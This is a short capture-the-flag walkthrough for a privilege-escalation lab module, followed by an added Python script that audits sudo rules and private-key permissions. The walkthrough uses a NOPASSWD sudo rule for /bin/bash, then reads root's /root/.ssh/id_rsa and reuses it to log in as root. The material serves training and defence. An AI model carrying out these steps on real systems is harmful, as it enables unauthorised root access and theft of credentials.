Getting started | privilege escalation | quick solve

Hello, it's x69h4ck3r here again.

I am gonna make this quick.

In order to solve this module, we need to gain access to the target machine via ssh. After that, we gain super user rights on the user2 user, then escalate our privileges to the root user.

Please follow my steps; I will try to make this as easy as possible.

Step 1: Connect to the target machine via ssh with the credentials provided.
example; ssh -l user1 <target_ip> -p <port>

Step 2: Input the given password in the password field.

NB: password text does not show as you type on unix systems.

Step 3: Once connected, verify which user you are logged in as.
example; whoami

Step 4: Once sure you are user1, change directory to user2.
example; cd .. && cd user2 # this command will put you in the user2 directory

Step 5: Use the command below to check whether /bin/bash can be run
without a password.
example; sudo -l
output; env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User user1 may run the following commands on gettingstartedprivesc-385616-5779f4664c-847tn:
(user2 : user2) NOPASSWD: /bin/bash

From the output we see that user1 can run /bin/bash as user2 without a password, so we try it; if no error is returned, we then proceed to getting our first flag.

Step 6: use this command to view the /flag.txt file
example; cat flag.txt

GAINING SUPER USER PRIVILEGE

The /root/.ssh/id_rsa file holds the ssh key; if we can read that, then we can use it to our advantage to connect over ssh as the root user.

We first have to copy the ssh key, create a new file on our host machine with the name “id_rsa” and paste the key in there. We will be using this file to connect to the target machine via ssh as the root user.

Step 1: Read the /root/.ssh/id_rsa file and copy the contents.
example; cat /root/.ssh/id_rsa # copy the contents (ssh key)

Step 2: On your host machine, create a new file “id_rsa” and paste the
copied contents in it.
example; nano id_rsa # once open, paste the copied contents (ssh key) and
# save.

Step 3: Cross-check you have done a good job by viewing the newly created
file.
example; cat id_rsa

Step 4: change the permissions on the newly created file to be more restrictive.
example; chmod 600 id_rsa

Step 5: Connect to the target server via ssh as the root user, using
the id_rsa file for authentication; this way we can gain root access.
example; ssh root@<target_ip> -p <port> -i id_rsa

Once connected, you will be in the root folder.

View the contents of the folder with the “ls” command.

Step 6: Use the cat command to view the flag in the /flag.txt file
example; cat flag.txt

I hope it helps… Good luck.
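
For the defensive side of the two weaknesses used above (a NOPASSWD sudo rule for /bin/bash, and a root private key readable by another user), here is an added Python example, not part of the original post, that flags shell-granting rules in `sudo -l` output and private-key modes open to group or others. The sample output beyond the quoted rule, the `SHELL_LIKE` list and the function names are assumptions made for illustration.

```python
import re
import stat

# Constructed sample; the first rule is the one quoted in the post.
SAMPLE_SUDO_L = """\
User user1 may run the following commands on examplehost:
    (user2 : user2) NOPASSWD: /bin/bash
    (root) /usr/bin/systemctl status nginx
    (ALL : ALL) NOPASSWD: /usr/bin/python3, /usr/bin/less /var/log/syslog
"""

# Assumption: illustrative, not exhaustive, list of binaries that give the
# caller a shell or arbitrary code execution as the run-as user.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby"}

# "(runas_user : runas_group) [TAG: ...] command[, command ...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return (runas_user, command, nopasswd) for every shell-granting rule."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults entries, blank lines
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            argv = cmd.split()
            if not argv:
                continue
            binary = argv[0].rsplit("/", 1)[-1]
            if argv[0] == "ALL" or binary in SHELL_LIKE:
                findings.append((runas, cmd.strip(), nopasswd))
    return findings


def key_mode_too_open(st_mode):
    """True if a private key's mode grants any access to group or others
    (the same permission bits that Step 4's chmod 600 clears)."""
    return bool(stat.S_IMODE(st_mode) & 0o077)


if __name__ == "__main__":
    for runas, cmd, nopasswd in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"run-as={runas} nopasswd={nopasswd} command={cmd}")
    # Constructed modes: 0o100644 is world-readable, 0o100600 is owner-only.
    print(key_mode_too_open(0o100644), key_mode_too_open(0o100600))
```

On a real host, feed `audit_sudo_l` the output of `sudo -l -U <user>` run by an administrator, and pass `os.stat(path).st_mode` for each private key to `key_mode_too_open`; directory permissions along the path to the key matter as well and are not checked here.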